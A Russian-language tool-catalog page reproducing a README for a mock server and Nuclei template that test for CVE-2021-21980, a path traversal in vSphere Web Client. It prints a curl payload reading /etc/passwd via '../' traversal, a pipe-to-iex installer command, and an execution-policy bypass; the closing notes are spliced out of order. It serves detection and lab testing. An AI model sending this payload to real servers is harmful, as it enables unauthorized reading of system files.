Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2021-21980-mock-server — CVE-2021-21980 | Kitploit
Инструменты/GitHubGitHub/gui2000guix-ui/cve-2021-21980-mock-server
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubgui2000guix-ui/cve-2021-21980-mock-server

cve-2021-21980-mock-server

CVE-2021-21980

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
8 месяцев назадЕщё не проверено

Clippy of the Dead - среда тестирования CVE-2021-21980 и шаблон Nuclei

Этот репозиторий содержит высоконадёжный шаблон Nuclei для обнаружения CVE-2021-21980 (path traversal в vSphere Web Client) и небольшую имитационную среду, воспроизводящую уязвимое поведение для безопасного локального тестирования.

Файлы:

  • cve-2021-21980.yaml: шаблон Nuclei с несколькими вариантами кодирования и матчерами
  • app.py: небольшое Flask-приложение, имитирующее уязвимость path traversal в /eam/vib
  • Dockerfile: образ контейнера для имитационного сервера с самоподписанным TLS-сертификатом
  • docker-compose.yml: запускает имитационный сервер, прослушивающий порт 8443 на хосте
  • requirements.txt: зависимости Python

Отказ от ответственности

  • Этот репозиторий предназначен только для исследовательских, тестовых и защитных целей. Не используйте его против систем, которые вы не уполномочены сканировать.
  • Этот имитационный сервер не является VMware vCenter; он лишь имитирует уязвимое поведение для безопасного PoC/тестирования.

Как запустить локально (пример для Windows PowerShell)

  1. Соберите и запустите имитационный контейнер:
root@kitploit:~
cd C:\Users\gui\Documents\hi
docker-compose up --build -d

Имитационный сервер будет слушать https://localhost:8443 (самоподписанный TLS-сертификат).

  1. Быстрая проверка curl (флаг insecure, так как сертификат самоподписанный):
root@kitploit:~
curl -k "https://localhost:8443/"  # should return VMware vSphere Web Client (mock)
curl -k "https://localhost:8443/eam/vib?id=../../../../../../../../../../etc/passwd"

Вы должны получить содержимое имитационного файла /app/sensitive/passwd-mock.

  1. Запустите Nuclei (сначала установите Nuclei), чтобы проверить шаблон на имитационном сервере:
root@kitploit:~
nuclei -t cve-2021-21980.yaml -u https://localhost:8443 -insecure
  1. В случае успеха в выводе должно появиться совпадение для PoC.

Примечания по тестированию

  • Если вы хотите проверить множество вариантов кодирования, запускайте шаблон Nuclei с высоким уровнем подробности вывода.

  • Этот имитационный сервер возвращает имитационный файл, повторяющий /etc/passwd; в реальной среде Автоматизированный тестовый сценарий

    Запустите run_local_test.ps1, который собирает образ, ожидает готовности и выполняет проверки curl, а также запускает Nuclei, если он доступен.

    root@kitploit:~
    powershell -ExecutionPolicy Bypass -File .\run_local_test.ps1
    

    Установка Nuclei на Windows (кратко):

    1. С помощью Scoop (рекомендуется):
    root@kitploit:~
    iwr -useb get.scoop.sh | iex
    scoop install coreutils
    scoop install nuclei
    
    1. Или загрузите из релизов и добавьте в PATH:
    root@kitploit:~
    Invoke-WebRequest -Uri https://github.com/projectdiscovery/nuclei/releases/latest/download/nuclei_windows_amd64.zip -OutFile nuclei.zip
    Expand-Archive -Path nuclei.zip -DestinationPath .\nuclei
    Add-Content -Path $PROFILE -Value 'set PATH=$Env:PATH;$(Resolve-Path .\nuclei)'
    

    Примечания

Безопасность: всегда получайте явное разрешение перед сканированием или эксплуатацией систем.

Скачать инструмент

Если nuclei отсутствует в PATH, run_local_test.ps1 выполнит только проверки curl.
Если возникли проблемы со сборкой Docker-образа, убедитесь, что установлен Docker Desktop и включён параметр 'Use the WSL 2 based engine'. /etc/passwd или аналогичный файл будет возвращён, если сервер уязвим.